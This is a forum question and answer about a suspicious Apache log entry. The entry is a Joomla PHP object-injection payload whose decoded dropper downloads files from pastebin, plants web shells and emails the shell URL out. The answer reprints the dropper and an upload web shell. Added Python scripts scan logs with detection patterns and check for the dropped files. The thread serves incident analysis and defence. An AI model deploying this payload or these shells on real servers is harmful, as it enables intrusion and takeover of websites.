I have recently been working on preventing SQL injection in my production Apache/PHP/MySQL web application.
To that end, I often browse the Apache access logs looking for unusual requests, and occasionally try to replicate them if I find them peculiar (does anyone have a better suggestion?).
Today I saw a strange entry in the access log. I can see that the HTTP referer is present, but I have no matching log of the original request. There is no matching entry in the Apache error log either, which means it was "denied by server configuration".
Here is the strange log entry (base_64 decoded):
169.239.180.100 - - [22/Mar/2017:04:01:37 +0000] "GET / HTTP/1.1" 200 13963 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\0\0\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3462:\"$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/lol.php"; $fp=fopen("$check","w+"); fwrite($fp,base64_decode('
<?php
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/wl.php" ;
$text = http_get('http://pastebin.com/raw/hjvDMQX1');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
echo $check."</br>";
}else
echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://pastebin.com/raw/KPh36MAb');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
echo $check2."</br>";
}else
echo "not exits2";
echo "done2 .\n " ;
$check3=$_SERVER['DOCUMENT_ROOT'] . "/s.htm" ;
$text3 = http_get('http://pastebin.com/raw/3Z6ZCHtZ');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);
$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://pastebin.com/raw/RA3giT4L');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);
$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://pastebin.com/raw/KPh36MAb');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);
$toz = "daniel.3.walker@gmail.com";
$subject = 'Jom zzz ' . $_SERVER['SERVER_NAME'];
$header = 'from: Saico <daniel.3.walker@gmail.com>' . "\r\n";
$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";
$sentmail = @mail($toz, $subject, $message, $header);
@unlink(__FILE__);
?>
'));fclose($fp);JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\0\0\0connection\";b:1;}\xf0\xfd\xfd\xfd"
I tried to replicate this GET request via Postman, but it is treated as an "invalid XMLHttpRequest". I'm not sure how one would normally test this?
I'm also not sure what this does (or tries to do). Any information/theories on this attempt (and whether it might succeed) would be greatly appreciated.
I think this is just a simple attempt to inject SQL into some "framework" via the HTTP referer, but I'm no expert. Thanks in advance for your help.
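A defender-side check for entries like the one above, added here as an example (it is not part of the original question or answer): it parses Apache combined-format lines and flags header-carried fields (referer, User-Agent, request line) that contain PHP serialize() object markers or the file-writing primitives seen in the posted payload. The two log lines are constructed for the example (the second mimics the shape of the posted entry); the regular expressions, signature names and function names are assumptions of this example, not anything from Apache or Joomla.

```python
import re

# Apache "combined" log format: client ident user [time] "request" status bytes "referer" "user-agent".
# Apache escapes embedded quotes as \" inside quoted fields, so each field is (?:[^"\\]|\\.)*.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)

# Markers of a PHP object-injection payload carried in request headers (names are this example's).
# The posted log shows a serialized JDatabaseDriverMysqli object; the other patterns are generic to
# PHP serialize() output and to "write a file to disk" droppers. They accept a quote with or without
# the Apache backslash escape.
SIGNATURES = {
    "php_serialized_object": re.compile(r'O:\d+:\\?"[A-Za-z_][A-Za-z0-9_]*\\?":\d+:\{'),
    "serialized_string_member": re.compile(r's:\d+:\\?"'),
    "joomla_db_driver_class": re.compile(r'JDatabaseDriverMysqli?'),
    "dropper_primitives": re.compile(r'fopen\s*\(|fwrite\s*\(|base64_decode\s*\('),
}

# Constructed sample: one ordinary request and one whose User-Agent carries a serialized object.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Mar/2017:03:59:01 +0000] "GET /index.php HTTP/1.1" 200 5120 '
    '"http://example.org/" "Mozilla/5.0 (X11; Linux x86_64)"',
    '169.239.180.100 - - [22/Mar/2017:04:01:37 +0000] "GET / HTTP/1.1" 200 13963 "-" '
    '"}__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:2:\\"fc\\";O:17:\\"JSimplepieFactory\\":0:{}'
    's:8:\\"feed_url\\";s:60:\\"$fp=fopen($check,\\"w+\\");fwrite($fp,base64_decode(...));\\";}"',
]


def parse_combined(line):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def scan_fields(entry):
    """Return [(field, signature_name), ...] for the attacker-controlled fields that match."""
    findings = []
    for field in ("referer", "agent", "request"):
        value = entry[field]
        for name, pattern in SIGNATURES.items():
            if pattern.search(value):
                findings.append((field, name))
    return findings


def scan_log(lines):
    """Return one report per suspicious line: source IP, timestamp, fields hit and signatures hit."""
    reports = []
    for line in lines:
        entry = parse_combined(line)
        if entry is None:
            continue  # not combined format, or a truncated line: skip rather than guess
        hits = scan_fields(entry)
        if hits:
            reports.append({
                "ip": entry["ip"],
                "time": entry["time"],
                "fields": sorted({f for f, _ in hits}),
                "signatures": sorted({n for _, n in hits}),
            })
    return reports


if __name__ == "__main__":
    for report in scan_log(SAMPLE_LOG):
        print(report)
```

The `php_serialized_object` pattern (an `O:<len>:"<class>":<n>:{` prefix) is the strong signal; `serialized_string_member` on its own is broad and is only worth reporting together with one of the others. Run the script over a real `access.log` by replacing `SAMPLE_LOG` with `open(path)`; the byte `\xf0\xfd\xfd\xfd` tail in the posted entry is how Apache renders the non-printable bytes the payload ends with, so the pattern set does not depend on it.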
Answer 0: (score: 1)
This is what I got when I decoded it:
<?php
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/lol.php" ;
$fp=fopen("$check","w+");
fwrite($fp,
function http_get($url){
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/wl.php" ;
$text = http_get('http://pastebin.com/raw/hjvDMQX1');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
echo $check."</br>";
}else
echo "not exits";
echo "done .\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;
$text2 = http_get('http://pastebin.com/raw/KPh36MAb');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
echo $check2."</br>";
}else
echo "not exits2";
echo "done2 .\n " ;
$check3=$_SERVER['DOCUMENT_ROOT'] . "/s.htm" ;
$text3 = http_get('http://pastebin.com/raw/3Z6ZCHtZ');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);
$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;
$text4 = http_get('http://pastebin.com/raw/RA3giT4L');
$op4=fopen($check4, 'w');
fwrite($op4,$text4);
fclose($op4);
$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;
$text5 = http_get('http://pastebin.com/raw/KPh36MAb');
$op5=fopen($check5, 'w');
fwrite($op5,$text5);
fclose($op5);
It looks like you are using the Joomla CMS. There is a file lol.php in the libraries folder which is called by the script. Another file, /libraries/joomla/wl.php, is also a malicious file that gets called. In addition, the pastebin code is being executed:
<?php
// name of the file is: i (it has no extension)
error_reporting(0);
if(isset($_GET["0"]))
{
echo"<font color=#000FFF>[uname]".php_uname()."[/uname]";echo "<br>";print "\n";if(@ini_get("disable_functions")){echo "DisablePHP=".@ini_get("disable_functions");}else{ echo "Disable PHP = NONE";}echo "<br>";print "\n";if(@ini_get("safe_mode")){echo "Safe Mode = ON";}else{ echo "Safe Mode = OFF";} echo "<br>";print "\n";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}} }
echo 'walex';
echo 'uname:'.php_uname()."\n";
echo getcwd() . "\n";
?>
It is writing the pastebin code to your file /libraries/joomla/jmail.php.
Conclusion:
If you are not using the Joomla CMS, there is no need to worry. If you are, then you need to check those affected files. Malicious files may have been uploaded to your server.
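One way to act on that conclusion, added here as an example (not part of the answer above): a check that looks under the document root for the exact paths the decoded dropper writes, reports size, modification time and SHA-256 for any that exist, and separately lists every PHP file modified after a reference time, since a dropped shell is newer than the install. The path list is taken from the decoded payload on this page; the function names, the `DROPPED_PATHS` constant and the temporary fixture in `demo()` (a fake document root with one placeholder file) are this example's own assumptions.

```python
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone

# Files the decoded payload on this page writes under $_SERVER['DOCUMENT_ROOT'].
DROPPED_PATHS = [
    "libraries/lol.php",
    "libraries/joomla/wl.php",
    "libraries/joomla/jmail.php",
    "libraries/joomla/jmails.php",
    "libraries/joomla/check.php",
    "s.htm",
]


def sha256_of(path):
    """Hash a file in chunks so large files do not have to be read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def check_dropped_files(docroot, relative_paths=DROPPED_PATHS):
    """Report each known dropper target that exists under docroot: path, size, mtime (UTC) and SHA-256."""
    found = []
    for rel in relative_paths:
        path = os.path.join(docroot, rel)
        if not os.path.isfile(path):
            continue
        st = os.stat(path)
        found.append({
            "path": rel,
            "size": st.st_size,
            "mtime": datetime.fromtimestamp(st.st_mtime, tz=timezone.utc).isoformat(),
            "sha256": sha256_of(path),
        })
    return found


def find_recent_php(docroot, newer_than_epoch):
    """List PHP files under docroot modified after the given Unix time, relative to docroot."""
    hits = []
    for dirpath, _, filenames in os.walk(docroot):
        for name in filenames:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                if os.stat(full).st_mtime > newer_than_epoch:
                    hits.append(os.path.relpath(full, docroot))
    return sorted(hits)


def demo():
    """Constructed fixture: a throwaway document root with one placeholder file at a dropper path."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "libraries", "joomla"))
        with open(os.path.join(root, "libraries", "joomla", "jmail.php"), "w") as f:
            f.write("<?php /* constructed placeholder, not the real dropped file */ ?>")
        # newer_than_epoch=0 lists every PHP file; on a real site use the last deployment time.
        return {
            "dropped": check_dropped_files(root),
            "recent": find_recent_php(root, newer_than_epoch=0),
        }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

On a real server, call `check_dropped_files("/var/www/html")` and `find_recent_php("/var/www/html", last_deploy_epoch)`; an empty first list only means these particular names are absent, which is why the second sweep is there. Record the hashes before removing anything so the files can be compared against the pastebin content the answer names.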